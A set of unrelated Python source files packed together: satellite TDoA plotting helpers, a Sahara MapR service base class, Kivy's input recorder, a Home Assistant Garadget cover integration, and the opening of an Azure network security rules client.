ax1.scatter(x_sat_orbdyn_stm[0,0], x_sat_orbdyn_stm[1,0], x_sat_orbdyn_stm[2,0], s=10, marker='x', c = 'r')
x_berr_norm = np.linalg.norm(x_berr, axis=0)
norm_mask = x_berr_norm < 5000
traj = ax1.plot(x_sat_orbdyn_stm[0,:4], x_sat_orbdyn_stm[1,:4], x_sat_orbdyn_stm[2,:4], c='k')
traj_proxy = ax1.scatter(x_sat_orbdyn_stm[0,0], x_sat_orbdyn_stm[1,0], x_sat_orbdyn_stm[2,0], c='k', s=10)
# Batch results
for i in range(x_0r.shape[1]):
if x_berr_norm[i] < 100000:
s1 = ax1.scatter(x_0r[0, i], x_0r[1, i], x_0r[2, i], c='b', s=40, marker='x')
s2 = ax1.scatter(x_br[0, i], x_br[1, i], x_br[2, i], c='r', s=20)
ax1.set_xlabel("x ECI (m)", fontsize=16, labelpad=15)
ax1.set_ylabel("y ECI (m)", fontsize=16, labelpad=15)
ax1.set_zlabel("z ECI (m)", fontsize=16, labelpad=15)
s1_proxy = ax1.scatter(x_0r[0, 0], x_0r[1, 0], x_0r[2, 0], c='b', s=40, marker='x')
s2_proxy = ax1.scatter(x_br[0, 1], x_br[1, 1], x_br[2, 1], c='r', s=20)
ax1.legend((traj_proxy, s1_proxy, s2_proxy),
('Groundtruth trajectory', 'Pre-batch positions', 'Post-batch positions'),
loc=2, bbox_to_anchor=(0.15,0.9))
return fig
def plot_tdoa(tdoa:np.ndarray, tof:np.ndarray, t_sec:np.ndarray, title=None):
""" Plot TDoA measurements.
Args:
tdoa (np.ndarray): time differential of arrival array (n_obs, n).
tof (np.ndarray): time of flight array (n_obs, n).
t_sec (np.ndarray): time array, seconds (n,).
Returns:
fig ():
"""
fig = plt.figure(figsize=(14,7))
font = {'size': 16}
matplotlib.rc('font', **font)
if title is not None:
fig.suptitle(title)
# Reference station time of flight
ax = fig.add_subplot(2, 2, 1)
ax.plot(t_sec, tof[0,:])
ax.set_xlabel('Time (s)', fontsize=16, labelpad=10)
ax.set_ylabel('Time of flight (s)', fontsize=16, labelpad=10)
ax.grid(':')
ax.title.set_text(f"Station 0 ToF")
plt.ticklabel_format(axis="y", style="sci", scilimits=(0,0))
# Time differential of arrival for the rest of three stations
for i in range(tdoa.shape[0]-1):
ax = fig.add_subplot(2, 2, i+2)
ax.plot(t_sec, tdoa[i+1,:])
ax.set_xlabel('Time (s)', fontsize=16, labelpad=10)
ax.set_ylabel('Time differential (s)', fontsize=16, labelpad=10)
ax.grid(':')
ax.title.set_text(f"Station {i+1}-0 TDoA")
plt.ticklabel_format(axis="y", style="sci", scilimits=(0,0))
fig.subplots_adjust(hspace=0.5)
return fig
def plot_tdoa_results(p_sat:np.ndarray, x_obs:np.ndarray, x_sat:np.ndarray=None, angle=None):
""" Plot results of TDoA multilateration.
Args:
p_sat (np.ndarray): multilaterated satellite position (3, n).
x_obs (np.ndarray): observer positions (6, n, n_obs).
x_sat (np.ndarray): groundtruth satellite position (6, n).
Returns:
fig ():
"""
x_obs_mean = np.mean(x_obs,axis=2)
font = {'size': 16}
matplotlib.rc('font', **font)
txtp, txtn = 1.002, 0.998 # Temporary variables - text location
fig = plt.figure(figsize=(10,10))
ax = fig.add_subplot(111, projection='3d')
ax.title.set_text("TDoA Example")
#plot_sphere(ax, d=R_EQ, n=40)
# Observer
obs = ax.scatter(x_obs[0,0,:], x_obs[1,0,:], x_obs[2,0,:], c='b')
for j in range(x_obs.shape[2]):
ax.text(x_obs[0,0,j]*txtp, x_obs[1,0,j]*txtp, x_obs[2,0,j]*txtp, f"Obs_1 {j}",c='k',fontsize=10)
ax.scatter(x_obs[0,:,:], x_obs[1,:,:], x_obs[2,:,:], marker='.', s=0.5, c='b')
# # Mean observer position
# ax.scatter(x_obs_mean[0, :], x_obs_mean[1, :], x_obs_mean[2, :], marker='.', s=1, alpha=0.1)
# ax.text(x_obs_mean[0, 0]*txtn, x_obs_mean[1, 0]*txtn, x_obs_mean[2, 0]*txtn, f"Observer (mean)")
if x_sat is not None:
# Satellite
sat = ax.scatter(x_sat[0,:], x_sat[1,:], x_sat[2,:])
sat_0 = ax.scatter(x_sat[0,0], x_sat[1,0], x_sat[2,0], marker='x')
ax.text(x_sat[0,0]*txtp, x_sat[1,0]*txtp, x_sat[2,0]*txtp, "Satellite")
# Result trajectory
ax.scatter(p_sat[0,:], p_sat[1,:], p_sat[2,:],alpha=0.4,s=0.5,c='k')
res = ax.scatter(p_sat[0,0], p_sat[1,0], p_sat[2,0],c='k')
o = ax.scatter(0,0,0,c='teal')
# Temp legend workaround
if x_sat is not None:
ax.legend([res, sat, sat_0, obs, o],["Result Trajectory", "Groundtruth", "Start", "Observers", "Origin"], loc=2, bbox_to_anchor=(0.15,0.9))
else:
ax.legend([res, obs, o],["Result Trajectory", "Observers", "Origin"], loc=2, bbox_to_anchor=(0.15,0.9))
ax.ticklabel_format(axis="x", style="sci", scilimits=(0,0))
ax.ticklabel_format(axis="y", style="sci", scilimits=(0,0))
ax.ticklabel_format(axis="z", style="sci", scilimits=(0,0))
ax.set_xlabel("x ECI (m)", fontsize=16, labelpad=15)
ax.set_ylabel("y ECI (m)", fontsize=16, labelpad=15)
ax.set_zlabel("z ECI (m)", fontsize=16, labelpad=15)
if angle is not None:
ax.view_init(angle[0], angle[1])
return fig
def plot_tdoa_errors(p_sat, x_sat, title=None):
""" Plots TDoA multilateration errors compared to groundtruth trajectory.
Args:
p_sat (np.ndarray): multilaterated satellite position (3, n).
x_sat (np.ndarray): groundtruth satellite position (6, n).
Returns:
fig ():
"""
tdoa_error = x_sat[0:3,:] - p_sat[0:3,:]
fig = plt.figure(figsize=(14,7))
plt.ticklabel_format(axis="y", style="sci", scilimits=(0,0))
font = {'size': 16}
matplotlib.rc('font', **font)
ax = fig.add_subplot(111)
ax.grid(':')
if title is not None:
ax.title.set_text(title)
xx = ax.plot(tdoa_error[0,:], linewidth=1)
yy = ax.plot(tdoa_error[1,:], linewidth=1)
zz = ax.plot(tdoa_error[2,:], linewidth=1)
ax.set_xlabel("Time (seconds)", fontsize=16, labelpad=10)
ax.set_ylabel("Error (m)", fontsize=16, labelpad=10)
ax.legend(["x","y","z"],loc=0)
return fig
def plot_tdoa_hg_errors(x_sat, t_sec, x_sat_hg, w):
""" Plots TDoA multilateration errors compared to groundtruth trajectory.
Args:
x_sat (np.ndarray): groundtruth satellite state vector (6, n).
t_sec (np.ndarray): time array (n,).
x_sat_hg (np.ndarray): estimated satellite state vector (TDoA+Herrick-Gibbs).
w (np.ndarray): estimated window size.
Returns:
fig ():
"""
t_sat_hg = t_sec[w:-w]
diff = x_sat[:,w:-w] - x_sat_hg
fig = plt.figure(figsize=(14,7))
ax_1 = fig.add_subplot(1,2,1)
xx = ax_1.plot(t_sat_hg, diff[0,:], linewidth=1)
yy = ax_1.plot(t_sat_hg, diff[1,:], linewidth=1)
zz = ax_1.plot(t_sat_hg, diff[2,:], linewidth=1)
ax_1.grid(':')
ax_1.legend(["x","y","z"],loc=0)
ax_1.set_xlabel("Time (seconds)")
ax_1.set_ylabel("Error (m)")
ax_1.title.set_text("Position Error, TDoA + Herrick-Gibbs")
ax_2 = fig.add_subplot(1,2,2)
v_xx = ax_2.plot(t_sat_hg, diff[3,:], linewidth=1)
v_yy = ax_2.plot(t_sat_hg, diff[4,:], linewidth=1)
v_zz = ax_2.plot(t_sat_hg, diff[5,:], linewidth=1)
ax_2.grid(':')
ax_2.legend(["x","y","z"], loc=0)
ax_2.set_xlabel("Time (seconds)")
ax_2.set_ylabel("Error (m/s)")
ax_2.title.set_text("Velocity Error, TDoA + Herrick-Gibbs")
return fig
def save_images(x_sat, x_obs, t_sec=None, prefix="", path=""):
""" Auxiliary function to save the images.
Args:
x_sat (np.ndarray): satellite state vectors (6,n).
x_obs (np.ndarray): observer state vectors (6,n,n_ons).
t_sec (np.ndarray): time array (n,).
prefix (str): filename prefix.
path (str): save path.
Returns:
None
"""
fig_1 = plot_example_3d(x_sat, x_obs)
fig_1.savefig(os.path.join(path, f"{prefix}_scenario"))
fig_2 = plot_range_range_rate(x_sat, x_obs, t_sec)
fig_2.savefig(os.path.join(path, f"{prefix}_range_range_rate"))
def save_images_batch_results(x_sat, x_0r, x_br, x_berr, prefix="", path=""):
""" Auxiliary function to save the batch result images.
Args:
x_sat (np.ndarray): satellite state vectors (6,n).
x_0r (np.ndarray): vector of pre-batch initial positions (6,n).
x_br (np.ndarray): vector if post-batch estimated initial positions (6,n).
x_berr(np.ndarray): vector of errors (6,n).
prefix (str): filename prefix.
path (str): save path.
Returns:
None
"""
fig_3 = plot_batch_results(x_sat, x_0r, x_br, x_berr)
fig_3.savefig(os.path.join(path, f"{prefix}_range_range_rate"))
|
|
# Copyright (c) 2015, MapR Technologies
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_log import log as logging
from oslo_serialization import jsonutils as json
import six
import sahara.exceptions as e
from sahara.i18n import _
import sahara.plugins.exceptions as ex
from sahara.plugins.mapr.util import commands as cmd
from sahara.plugins.mapr.util import event_log as el
from sahara.plugins.mapr.util import general as g
from sahara.plugins.mapr.util import service_utils as su
import sahara.plugins.provisioning as p
from sahara.utils import files as files
LOG = logging.getLogger(__name__)
SERVICE_UI = 'Web UI'
_INSTALL_PACKAGES_TIMEOUT = 3600
@six.add_metaclass(g.Singleton)
class Service(object):
def __init__(self):
self._name = None
self._ui_name = None
self._node_processes = []
self._version = None
self._dependencies = []
self._ui_info = []
self._cluster_defaults = []
self._node_defaults = []
self._validation_rules = []
self._priority = 1
@property
def name(self):
return self._name
@property
def ui_name(self):
return self._ui_name
@property
def version(self):
return self._version
@property
def node_processes(self):
return self._node_processes
@property
def dependencies(self):
return self._dependencies
@property
def cluster_defaults(self):
return self._cluster_defaults
@property
def node_defaults(self):
return self._node_defaults
@property
def validation_rules(self):
return self._validation_rules
def get_ui_info(self, cluster_context):
return self._ui_info
def install(self, cluster_context, instances):
service_instances = cluster_context.filter_instances(instances,
service=self)
@el.provision_step(_("Install %s service") % self.ui_name,
cluster_context_reference=0, instances_reference=1)
def _install(_context, _instances):
g.execute_on_instances(_instances,
self._install_packages_on_instance,
_context)
_install(cluster_context, service_instances)
@el.provision_event(instance_reference=1)
def _install_packages_on_instance(self, instance, cluster_context):
processes = [p for p in self.node_processes if
p.ui_name in instance.node_group.node_processes]
if processes is not None and len(processes) > 0:
packages = self._get_packages(cluster_context, processes)
cmd = cluster_context.distro.create_install_cmd(packages)
with instance.remote() as r:
r.execute_command(cmd, run_as_root=True,
timeout=_INSTALL_PACKAGES_TIMEOUT)
def _get_packages(self, cluster_context, node_processes):
result = []
result += self.dependencies
result += [(np.package, self.version) for np in node_processes]
return result
def _set_service_dir_owner(self, cluster_context, instances):
service_instances = cluster_context.filter_instances(instances,
service=self)
LOG.debug("Changing %s service dir owner" % self.ui_name)
for instance in service_instances:
cmd.chown(instance, 'mapr:mapr', self.service_dir(cluster_context))
def post_install(self, cluster_context, instances):
pass
def post_start(self, cluster_context, instances):
pass
def configure(self, cluster_context, instances=None):
pass
def update(self, cluster_context, instances=None):
pass
def get_file_path(self, file_name):
template = 'plugins/mapr/services/%(service)s/resources/%(file_name)s'
args = {'service': self.name, 'file_name': file_name}
return template % args
def get_configs(self):
result = []
for d_file in self.cluster_defaults:
data = self._load_config_file(self.get_file_path(d_file))
result += [self._create_config_obj(c, self.ui_name) for c in data]
for d_file in self.node_defaults:
data = self._load_config_file(self.get_file_path(d_file))
result += [self._create_config_obj(c, self.ui_name, scope='node')
for c in data]
return result
def get_configs_dict(self):
result = dict()
for conf_obj in self.get_configs():
result.update({conf_obj.name: conf_obj.default_value})
return {self.ui_name: result}
def _load_config_file(self, file_path=None):
return json.loads(files.get_file_text(file_path))
def get_config_files(self, cluster_context, configs, instance=None):
return []
def _create_config_obj(self, item, target='general', scope='cluster',
high_priority=False):
def _prepare_value(value):
if isinstance(value, str):
return value.strip().lower()
return value
conf_name = _prepare_value(item.get('name', None))
conf_value = _prepare_value(item.get('value', None))
if not conf_name:
raise ex.HadoopProvisionError(_("Config missing 'name'"))
if conf_value is None:
raise e.InvalidDataException(
_("Config '%s' missing 'value'") % conf_name)
if high_priority or item.get('priority', 2) == 1:
priority = 1
else:
priority = 2
return p.Config(
name=conf_name,
applicable_target=target,
scope=scope,
config_type=item.get('config_type', "string"),
config_values=item.get('config_values', None),
default_value=conf_value,
is_optional=item.get('is_optional', True),
description=item.get('description', None),
priority=priority)
def get_version_config(self, versions):
return p.Config(
name='%s Version' % self._ui_name,
applicable_target=self.ui_name,
scope='cluster',
config_type='dropdown',
config_values=[(v, v) for v in sorted(versions, reverse=True)],
is_optional=False,
description=_('Specify the version of the service'),
priority=1)
def __eq__(self, other):
if isinstance(other, self.__class__):
version_eq = self.version == other.version
ui_name_eq = self.ui_name == other.ui_name
return version_eq and ui_name_eq
return NotImplemented
def restart(self, instances):
for node_process in self.node_processes:
filtered_instances = su.filter_by_node_process(instances,
node_process)
if filtered_instances:
node_process.restart(filtered_instances)
def service_dir(self, cluster_context):
args = {'mapr_home': cluster_context.mapr_home, 'name': self.name}
return '%(mapr_home)s/%(name)s' % args
def home_dir(self, cluster_context):
args = {
'service_dir': self.service_dir(cluster_context),
'name': self.name,
'version': self.version,
}
return '%(service_dir)s/%(name)s-%(version)s' % args
def conf_dir(self, cluster_context):
return '%s/conf' % self.home_dir(cluster_context)
def post_configure_sh(self, cluster_context, instances):
pass
def post_configure(self, cluster_context, instances):
pass
|
|
'''
Input recorder
==============
.. versionadded:: 1.1.0
.. warning::
This part of Kivy is still experimental and this API is subject to
change in a future version.
This is a class that can record and replay some input events. This can
be used for test cases, screen savers etc.
Once activated, the recorder will listen for any input event and save its
properties in a file with the delta time. Later, you can play the input
file: it will generate fake touch events with the saved properties and
dispatch it to the event loop.
By default, only the position is saved ('pos' profile and 'sx', 'sy',
attributes). Change it only if you understand how input handling works.
Recording events
----------------
The best way is to use the "recorder" module. Check the :doc:`api-kivy.modules`
documentation to see how to activate a module.
Once activated, you can press F8 to start the recording. By default,
events will be written to `<currentpath>/recorder.kvi`. When you want to
stop recording, press F8 again.
You can replay the file by pressing F7.
Check the :doc:`api-kivy.modules.recorder` module for more information.
Manual play
-----------
You can manually open a recorder file, and play it by doing::
from kivy.input.recorder import Recorder
rec = Recorder(filename='myrecorder.kvi')
rec.play = True
If you want to loop over that file, you can do::
from kivy.input.recorder import Recorder
def recorder_loop(instance, value):
if value is False:
instance.play = True
rec = Recorder(filename='myrecorder.kvi')
rec.bind(play=recorder_loop)
rec.play = True
Recording more attributes
-------------------------
You can extend the attributes to save on one condition: attributes values must
be simple values, not instances of complex classes.
Let's say you want to save the angle and pressure of the touch, if available::
from kivy.input.recorder import Recorder
rec = Recorder(filename='myrecorder.kvi',
record_attrs=['is_touch', 'sx', 'sy', 'angle', 'pressure'],
record_profile_mask=['pos', 'angle', 'pressure'])
rec.record = True
Or with modules variables::
$ python main.py -m recorder,attrs=is_touch:sx:sy:angle:pressure, \
profile_mask=pos:angle:pressure
Known limitations
-----------------
- Unable to save attributes with instances of complex classes.
- Values that represent time will not be adjusted.
- Can replay only complete records. If a begin/update/end event is missing,
this could lead to ghost touches.
- Stopping the replay before the end can lead to ghost touches.
'''
__all__ = ('Recorder', )
from os.path import exists
from time import time
from kivy.event import EventDispatcher
from kivy.properties import ObjectProperty, BooleanProperty, StringProperty, \
NumericProperty, ListProperty
from kivy.input.motionevent import MotionEvent
from kivy.base import EventLoop
from kivy.logger import Logger
from ast import literal_eval
from functools import partial
class RecorderMotionEvent(MotionEvent):
def depack(self, args):
for key, value in list(args.items()):
setattr(self, key, value)
super(RecorderMotionEvent, self).depack(args)
class Recorder(EventDispatcher):
'''Recorder class. Please check module documentation for more information.
:Events:
`on_stop`:
Fired when the playing stops.
.. versionchanged:: 1.10.0
Event `on_stop` added.
'''
window = ObjectProperty(None)
'''Window instance to attach the recorder. If None, it will use the
default instance.
:attr:`window` is a :class:`~kivy.properties.ObjectProperty` and
defaults to None.
'''
counter = NumericProperty(0)
'''Number of events recorded in the last session.
:attr:`counter` is a :class:`~kivy.properties.NumericProperty` and defaults
to 0, read-only.
'''
play = BooleanProperty(False)
'''Boolean to start/stop the replay of the current file (if it exists).
:attr:`play` is a :class:`~kivy.properties.BooleanProperty` and defaults to
False.
'''
record = BooleanProperty(False)
'''Boolean to start/stop the recording of input events.
:attr:`record` is a :class:`~kivy.properties.BooleanProperty` and defaults
to False.
'''
filename = StringProperty('recorder.kvi')
'''Filename to save the output of the recorder.
:attr:`filename` is a :class:`~kivy.properties.StringProperty` and defaults
to 'recorder.kvi'.
'''
record_attrs = ListProperty(['is_touch', 'sx', 'sy'])
'''Attributes to record from the motion event.
:attr:`record_attrs` is a :class:`~kivy.properties.ListProperty` and
defaults to ['is_touch', 'sx', 'sy'].
'''
record_profile_mask = ListProperty(['pos'])
'''Profile to save in the fake motion event when replayed.
:attr:`record_profile_mask` is a :class:`~kivy.properties.ListProperty` and
defaults to ['pos'].
'''
# internals
record_fd = ObjectProperty(None)
record_time = NumericProperty(0.)
__events__ = ('on_stop',)
def __init__(self, **kwargs):
super(Recorder, self).__init__(**kwargs)
if self.window is None:
# manually set the current window
from kivy.core.window import Window
self.window = Window
self.window.bind(
on_motion=self.on_motion,
on_key_up=partial(self.on_keyboard, 'keyup'),
on_key_down=partial(self.on_keyboard, 'keydown'),
on_keyboard=partial(self.on_keyboard, 'keyboard'))
def on_motion(self, window, etype, motionevent):
if not self.record:
return
args = dict((arg, getattr(motionevent, arg))
for arg in self.record_attrs if hasattr(motionevent, arg))
args['profile'] = [x for x in motionevent.profile if x in
self.record_profile_mask]
self.record_fd.write('%r\n' % (
(time() - self.record_time, etype, motionevent.uid, args), ))
self.counter += 1
def on_keyboard(self, etype, window, key, *args, **kwargs):
if not self.record:
return
self.record_fd.write('%r\n' % (
(time() - self.record_time, etype, 0, {
'key': key,
'scancode': kwargs.get('scancode'),
'codepoint': kwargs.get('codepoint', kwargs.get('unicode')),
'modifier': kwargs.get('modifier'),
'is_touch': False}), ))
self.counter += 1
def release(self):
self.window.unbind(
on_motion=self.on_motion,
on_key_up=self.on_keyboard,
on_key_down=self.on_keyboard)
def on_record(self, instance, value):
if value:
# generate a record filename
self.counter = 0
self.record_time = time()
self.record_fd = open(self.filename, 'w')
self.record_fd.write('#RECORDER1.0\n')
Logger.info('Recorder: Recording inputs to %r' % self.filename)
else:
self.record_fd.close()
Logger.info('Recorder: Recorded %d events in %r' % (self.counter,
self.filename))
# needed for acting as an input provider
def stop(self):
pass
def start(self):
pass
def on_play(self, instance, value):
if not value:
Logger.info('Recorder: Stop playing %r' % self.filename)
EventLoop.remove_input_provider(self)
return
if not exists(self.filename):
Logger.error('Recorder: Unable to find %r file, play aborted.' % (
self.filename))
return
with open(self.filename, 'r') as fd:
data = fd.read().splitlines()
if len(data) < 2:
Logger.error('Recorder: Unable to play %r, file truncated.' % (
self.filename))
return
if data[0] != '#RECORDER1.0':
Logger.error('Recorder: Unable to play %r, invalid header.' % (
self.filename))
return
# decompile data
self.play_data = [literal_eval(x) for x in data[1:]]
self.play_time = time()
self.play_me = {}
Logger.info('Recorder: Start playing %d events from %r' %
(len(self.play_data), self.filename))
EventLoop.add_input_provider(self)
def on_stop(self):
pass
def update(self, dispatch_fn):
if not self.play_data:
Logger.info('Recorder: Playing finished.')
self.play = False
self.dispatch('on_stop')
dt = time() - self.play_time
while self.play_data:
event = self.play_data[0]
assert(len(event) == 4)
if event[0] > dt:
return
me = None
etype, uid, args = event[1:]
if etype == 'begin':
me = RecorderMotionEvent('recorder', uid, args)
self.play_me[uid] = me
elif etype == 'update':
me = self.play_me[uid]
me.depack(args)
elif etype == 'end':
me = self.play_me.pop(uid)
me.depack(args)
elif etype == 'keydown':
self.window.dispatch(
'on_key_down',
args['key'],
args['scancode'],
args['codepoint'],
args['modifier'])
elif etype == 'keyup':
self.window.dispatch(
'on_key_up',
args['key'],
args['scancode'],
args['codepoint'],
args['modifier'])
elif etype == 'keyboard':
self.window.dispatch(
'on_keyboard',
args['key'],
args['scancode'],
args['codepoint'],
args['modifier'])
if me:
dispatch_fn(etype, me)
self.play_data.pop(0)
def start(win, ctx):
ctx.recorder = Recorder(window=win)
def stop(win, ctx):
if hasattr(ctx, 'recorder'):
ctx.recorder.release()
|
|
"""
Platform for the Garadget cover component.
For more details about this platform, please refer to the documentation
https://home-assistant.io/components/garadget/
"""
import logging
import requests
import voluptuous as vol
import homeassistant.helpers.config_validation as cv
from homeassistant.components.cover import CoverDevice, PLATFORM_SCHEMA
from homeassistant.helpers.event import track_utc_time_change
from homeassistant.const import (
CONF_DEVICE, CONF_USERNAME, CONF_PASSWORD, CONF_ACCESS_TOKEN, CONF_NAME,
STATE_CLOSED, STATE_OPEN, CONF_COVERS)
_LOGGER = logging.getLogger(__name__)
ATTR_AVAILABLE = 'available'
ATTR_SENSOR_STRENGTH = 'sensor_reflection_rate'
ATTR_SIGNAL_STRENGTH = 'wifi_signal_strength'
ATTR_TIME_IN_STATE = 'time_in_state'
DEFAULT_NAME = 'Garadget'
STATE_CLOSING = 'closing'
STATE_OFFLINE = 'offline'
STATE_OPENING = 'opening'
STATE_STOPPED = 'stopped'
STATES_MAP = {
'open': STATE_OPEN,
'opening': STATE_OPENING,
'closed': STATE_CLOSED,
'closing': STATE_CLOSING,
'stopped': STATE_STOPPED
}
COVER_SCHEMA = vol.Schema({
vol.Optional(CONF_ACCESS_TOKEN): cv.string,
vol.Optional(CONF_DEVICE): cv.string,
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(CONF_PASSWORD): cv.string,
vol.Optional(CONF_USERNAME): cv.string,
})
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Required(CONF_COVERS): cv.schema_with_slug_keys(COVER_SCHEMA),
})
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the Garadget covers."""
covers = []
devices = config.get(CONF_COVERS)
for device_id, device_config in devices.items():
args = {
'name': device_config.get(CONF_NAME),
'device_id': device_config.get(CONF_DEVICE, device_id),
'username': device_config.get(CONF_USERNAME),
'password': device_config.get(CONF_PASSWORD),
'access_token': device_config.get(CONF_ACCESS_TOKEN)
}
covers.append(GaradgetCover(hass, args))
add_entities(covers)
class GaradgetCover(CoverDevice):
"""Representation of a Garadget cover."""
def __init__(self, hass, args):
"""Initialize the cover."""
self.particle_url = 'https://api.particle.io'
self.hass = hass
self._name = args['name']
self.device_id = args['device_id']
self.access_token = args['access_token']
self.obtained_token = False
self._username = args['username']
self._password = args['password']
self._state = None
self.time_in_state = None
self.signal = None
self.sensor = None
self._unsub_listener_cover = None
self._available = True
if self.access_token is None:
self.access_token = self.get_token()
self._obtained_token = True
try:
if self._name is None:
doorconfig = self._get_variable('doorConfig')
if doorconfig['nme'] is not None:
self._name = doorconfig['nme']
self.update()
except requests.exceptions.ConnectionError as ex:
_LOGGER.error(
"Unable to connect to server: %(reason)s", dict(reason=ex))
self._state = STATE_OFFLINE
self._available = False
self._name = DEFAULT_NAME
except KeyError:
_LOGGER.warning("Garadget device %(device)s seems to be offline",
dict(device=self.device_id))
self._name = DEFAULT_NAME
self._state = STATE_OFFLINE
self._available = False
def __del__(self):
"""Try to remove token."""
if self._obtained_token is True:
if self.access_token is not None:
self.remove_token()
@property
def name(self):
"""Return the name of the cover."""
return self._name
@property
def should_poll(self):
"""No polling needed for a demo cover."""
return True
@property
def available(self):
"""Return True if entity is available."""
return self._available
@property
def device_state_attributes(self):
"""Return the device state attributes."""
data = {}
if self.signal is not None:
data[ATTR_SIGNAL_STRENGTH] = self.signal
if self.time_in_state is not None:
data[ATTR_TIME_IN_STATE] = self.time_in_state
if self.sensor is not None:
data[ATTR_SENSOR_STRENGTH] = self.sensor
if self.access_token is not None:
data[CONF_ACCESS_TOKEN] = self.access_token
return data
@property
def is_closed(self):
"""Return if the cover is closed."""
if self._state is None:
return None
return self._state == STATE_CLOSED
@property
def device_class(self):
"""Return the class of this device, from component DEVICE_CLASSES."""
return 'garage'
def get_token(self):
"""Get new token for usage during this session."""
args = {
'grant_type': 'password',
'username': self._username,
'password': self._password
}
url = '{}/oauth/token'.format(self.particle_url)
ret = requests.post(
url, auth=('particle', 'particle'), data=args, timeout=10)
try:
return ret.json()['access_token']
except KeyError:
_LOGGER.error("Unable to retrieve access token")
def remove_token(self):
"""Remove authorization token from API."""
url = '{}/v1/access_tokens/{}'.format(
self.particle_url, self.access_token)
ret = requests.delete(
url, auth=(self._username, self._password), timeout=10)
return ret.text
def _start_watcher(self, command):
"""Start watcher."""
_LOGGER.debug("Starting Watcher for command: %s ", command)
if self._unsub_listener_cover is None:
self._unsub_listener_cover = track_utc_time_change(
self.hass, self._check_state)
def _check_state(self, now):
"""Check the state of the service during an operation."""
self.schedule_update_ha_state(True)
def close_cover(self, **kwargs):
"""Close the cover."""
if self._state not in ['close', 'closing']:
ret = self._put_command('setState', 'close')
self._start_watcher('close')
return ret.get('return_value') == 1
def open_cover(self, **kwargs):
"""Open the cover."""
if self._state not in ['open', 'opening']:
ret = self._put_command('setState', 'open')
self._start_watcher('open')
return ret.get('return_value') == 1
def stop_cover(self, **kwargs):
"""Stop the door where it is."""
if self._state not in ['stopped']:
ret = self._put_command('setState', 'stop')
self._start_watcher('stop')
return ret['return_value'] == 1
def update(self):
"""Get updated status from API."""
try:
status = self._get_variable('doorStatus')
_LOGGER.debug("Current Status: %s", status['status'])
self._state = STATES_MAP.get(status['status'], None)
self.time_in_state = status['time']
self.signal = status['signal']
self.sensor = status['sensor']
self._available = True
except requests.exceptions.ConnectionError as ex:
_LOGGER.error(
"Unable to connect to server: %(reason)s", dict(reason=ex))
self._state = STATE_OFFLINE
except KeyError:
_LOGGER.warning("Garadget device %(device)s seems to be offline",
dict(device=self.device_id))
self._state = STATE_OFFLINE
if self._state not in [STATE_CLOSING, STATE_OPENING]:
if self._unsub_listener_cover is not None:
self._unsub_listener_cover()
self._unsub_listener_cover = None
def _get_variable(self, var):
"""Get latest status."""
url = '{}/v1/devices/{}/{}?access_token={}'.format(
self.particle_url, self.device_id, var, self.access_token)
ret = requests.get(url, timeout=10)
result = {}
for pairs in ret.json()['result'].split('|'):
key = pairs.split('=')
result[key[0]] = key[1]
return result
def _put_command(self, func, arg=None):
"""Send commands to API."""
params = {'access_token': self.access_token}
if arg:
params['command'] = arg
url = '{}/v1/devices/{}/{}'.format(
self.particle_url, self.device_id, func)
ret = requests.post(url, data=params, timeout=10)
return ret.json()
|
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from .. import models as _models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar, Union
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class SecurityRulesOperations(object):
"""SecurityRulesOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2016_12_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def _delete_initial(
self,
resource_group_name, # type: str
network_security_group_name, # type: str
security_rule_name, # type: str
**kwargs # type: Any
):
# type: (...) -> None
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-12-01"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkSecurityGroupName': self._serialize.url("network_security_group_name", network_security_group_name, 'str'),
'securityRuleName': self._serialize.url("security_rule_name", security_rule_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
